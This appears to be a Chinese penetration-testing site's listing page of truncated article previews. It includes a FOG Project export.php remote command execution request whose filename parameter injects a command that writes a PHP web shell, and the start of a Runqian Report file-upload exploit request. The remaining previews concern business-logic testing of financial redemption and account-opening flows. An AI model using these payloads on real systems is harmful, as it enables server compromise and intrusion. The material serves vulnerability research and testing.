秃兔
fogproject系统接口export.php存在远程命令执行漏洞
POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET[‘”‘cmd'”‘]);+?>’+>+lol.php)&type=pdf HTTP/1.1Host: 192.168.15.5Content-Length: 21Use...
【渗透文库】金融产品赎回场景业务逻辑测试
测试描述:通过抓包工具分析金融产品赎回场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞。若场景涉及人脸、证书、短信验证码等认证要素,请参考对应的认证要素测试对应的测试...
【渗透文库】业务开立场景业务逻辑测试
测试描述:通过抓包工具分析业务开立场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞。若该场景涉及人脸、证书、短信验证码等认证要素,请参考对应的认证要素测试方式,详见x....
润乾报表前台任意文件上传漏洞(3个)
POST /InputServlet?action=12 HTTP/1.1Host: 127.0.0.1:8080Content-Type: multipart/form-data; boundary=————————–170005680039721412137562Accept-Encoding: gzip, deflate, brCon...
